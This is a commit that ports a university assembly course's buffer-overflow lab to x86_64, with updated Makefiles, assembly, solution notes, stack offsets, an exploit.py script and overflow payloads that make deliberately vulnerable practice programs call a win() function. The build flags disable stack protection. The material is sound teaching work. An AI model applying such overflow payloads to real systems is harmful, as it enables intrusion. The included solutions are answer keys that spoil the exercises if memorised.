labs/lab-10: Add x86_64 version

# Prerequisite Checklist

Updated all reading materials, code, solutions to work on x86_64
assembly and use the extended ISA.
Because this lab includes payloads for buffer overflows and the
alignment on x64 is 16 bytes, I have also modified the overflow payloads
on each task and included short explanations.

Note: For the `overwrite-ret-addr` task I opted for a simple `printf()`
call instead of `system()`, because the `system()` internals use some
variables relative to `rbp`. Because of that, further analysis is needed
to correct the offsets and so the task becomes a little bit too
difficult.

Signed-off-by: Matei Buzdea <[email protected]>

Author: MateiBuzdea

labs/lab-10/tasks/data-buffer/support/Makefile

@@ -5,9 +5,9 @@ RM = rm
 SRCS := $(shell find . -name "*.asm")
 OBJS := $(SRCS:.asm=.o)
 
-ASFLAGS ?= -f elf32 -F dwarf
+ASFLAGS ?= -f elf64 -F dwarf
 CFLAGS ?= -Wall
-LDFLAGS ?= -m32 -no-pie
+LDFLAGS ?= -no-pie
 
 TARGET_EXEC = data_buffer
 

labs/lab-10/tasks/data-buffer/support/data_buffer.asm

@@ -20,47 +20,48 @@ section .text
 global main
 
 main:
-    push ebp
-    mov ebp, esp
+    push rbp
+    mov rbp, rsp
 
     ; Fill data in buffer: buffer[i] = i + 1
     ; ecx is buffer index (i), dl is buffer value (i + 1). dl needs to be ecx + 1.
     ; Buffer length is 64 bytes.
-    xor ecx, ecx
+    xor rcx, rcx
 fill_byte:
     mov dl, cl
     inc dl
-    mov byte [buffer + ecx], dl
-    inc ecx
-    cmp ecx, len
+    mov byte [buffer + rcx], dl
+    inc rcx
+    cmp rcx, len
     jl fill_byte
 
     ; Text before printing buffer.
-    push buffer_intro_message
+    mov rdi, buffer_intro_message
+    xor rax, rax
     call printf
-    add esp, 4
 
-    xor ecx, ecx
+    xor rcx, rcx
 print_byte:
-    xor eax, eax
-    mov al, byte[buffer + ecx]
-    push ecx	; save ecx, printf may change it
+    xor rax, rax
+    mov al, byte[buffer + rcx]
+    push rcx	; save ecx, printf may change it
+    sub rsp, 8	; align stack to 16 bytes
 
     ; Print current byte.
-    push eax
-    push byte_format
+    mov rsi, rax
+    mov rdi, byte_format
+    xor rax, rax
     call printf
-    add esp, 8
 
-    pop ecx	; restore ecx
-    inc ecx
-    cmp ecx, len
+    add rsp, 8	; restore stack
+    pop rcx	; restore ecx
+    inc rcx
+    cmp rcx, len
     jl print_byte
 
     ; Print new line. C equivalent instruction is puts("").
-    push null_string
+    mov rdi, null_string
     call puts
-    add esp, 4
 
     leave
     ret

labs/lab-10/tasks/overflow-for-binary/solution/Makefile

@@ -8,9 +8,9 @@ OBJS_ASM := $(SRCS_ASM:.asm=.o)
 SRCS_C := $(wildcard *.c)
 OBJS_C := $(SRCS_C:.c=.o)
 
-ASFLAGS ?= -f elf32 -F dwarf
-CFLAGS ?= -m32 -g -Wall -Wextra -Werror -fno-pic -masm=intel -fno-stack-protector
-LDFLAGS ?= -m32 -no-pie
+ASFLAGS ?= -f elf64 -F dwarf
+CFLAGS ?= -g -Wall -Wextra -Werror -fno-pic -masm=intel -fno-stack-protector
+LDFLAGS ?= -no-pie
 
 TARGET_EXEC = overflow_in_binary
 

labs/lab-10/tasks/overflow-for-binary/solution/README.md

@@ -12,6 +12,6 @@ parent: 'Task: Buffer Overflow for Binary'
 In `check_string()`:
 
 - `local_10` must be set to `0x4E305250` to call `win()` (carefully, use the little-endian encoding)
-- `local_10` is stored at stack - `0x10`
+- `local_10` is stored at `stack - 0x4`
 - The buffer is stored at `stack - 0x30`
-- So the payload should consist of `32 (48 - 16)` `'A'` characters, followed by `"\x50\x52\x30\x4E"`
+- So the payload should consist of `44 (48 - 4)` `'A'` characters, followed by `"\x50\x52\x30\x4E"`

labs/lab-10/tasks/overflow-for-binary/solution/exploit.py

@@ -3,7 +3,7 @@
 
 
 def run_executable():
-    argument = 32 * "A" + "\x50\x52\x30\x4e"
+    argument = 44 * "A" + "\x50\x52\x30\x4e"
     subprocess.run(["./overflow_in_binary", argument])
 
 

labs/lab-10/tasks/overflow-for-binary/solution/overflow_in_binary.c

@@ -7,11 +7,13 @@
 static void win(void)
 {
 	puts("Great success!");
+	fflush(stdout);
 }
 
 static void fail(void)
 {
 	puts("Epic failure!");
+	fflush(stdout);
 }
 
 static void check_string(const char *str)

labs/lab-10/tasks/overflow-for-binary/solution/payload

@@ -1 +1 @@
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPR0N
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPR0N

labs/lab-10/tasks/overflow-for-binary/support/overflow_in_binary

@@ -23,7 +23,7 @@ It is recommended to first take a look at the assembly file, then understand the
 > **HINT** To see the "real-world" reality, i.e., to find out what the difference is between the buffer and the variable we want to overwrite,
 > consult the equivalent assembly language file (`do_overflow.asm`), obtained by assembling the C code.
 > In this file, you can find the relative address of the buffer to `ebp` and the variable to `ebp`;
-> follow the sequence between lines `36` and `47`;
+> follow the sequence between lines `29` and `35` (it may vary depending on the compiler);
 > you have a mapping between the variable name and the relative offset to `ebp`.
 > With this information, you can create the string to transmit as a payload to the standard input of the program.
 > **NOTE** If you want to recompile the files run:

labs/lab-10/tasks/overflow-in-c/README.md

@@ -7,9 +7,9 @@ parent: 'Task: Buffer Overflow for Program Written in C'
 
 In `do_overflow.asm`:
 
-- `line 37` -> `sexy_var` is at `ebp - 16`
-- `line 47` -> start reading buffer at `ebp - 89`
-- 89 - 16 = 73 of `'A'`s
+- `line 29` -> `sexy_var` is at `ebp - 12`
+- `line 35` -> start reading buffer at `ebp - 96`
+- 96 - 12 = 84 of `'A'`s
 - and `0x5541494D` written in little-endian encoding
 
-For exercise **Stack Canary**, when running `objdump` in `main()`, look carefully at the instruction at the addresses `4dc`, as well as the code around it.
+For exercise **Stack Canary**, when running `objdump` in `main()`, look carefully at the instruction at the addresses `128b`, as well as the code around it.